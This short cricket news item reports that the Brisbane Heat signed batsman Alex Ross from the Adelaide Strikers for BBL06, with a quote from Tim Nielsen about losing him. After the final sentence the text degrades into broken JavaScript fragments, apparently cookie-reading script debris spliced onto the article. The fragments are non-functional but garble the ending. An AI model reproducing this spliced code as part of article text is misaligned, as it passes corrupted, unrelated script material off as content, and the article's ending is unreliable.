Brisbane Heat have pulled off a massive coup by signing Bradman Young Cricketer of the Year, Alex Ross for BBL06.

Ross was a star for the Adelaide Strikers in BBL05 and enjoyed an impressive 2015 Matador Cup with South Australia, scoring at an average of 59.25.

But the Heat have managed to lure the 23-year-old away from Adelaide to bolster their batting line-up that struggled for runs this season.

"It’s unfortunate news for us and Strikers fans because Alex has enjoyed an exciting BBL with the Strikers last season," South Australian Cricket Association high performance manager Tim Nielsen told The Adelaide Advertiser.

"We did our best to retain his services for the Strikers, but in this instance he’s decided to take on a new challenge with a different franchise." "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
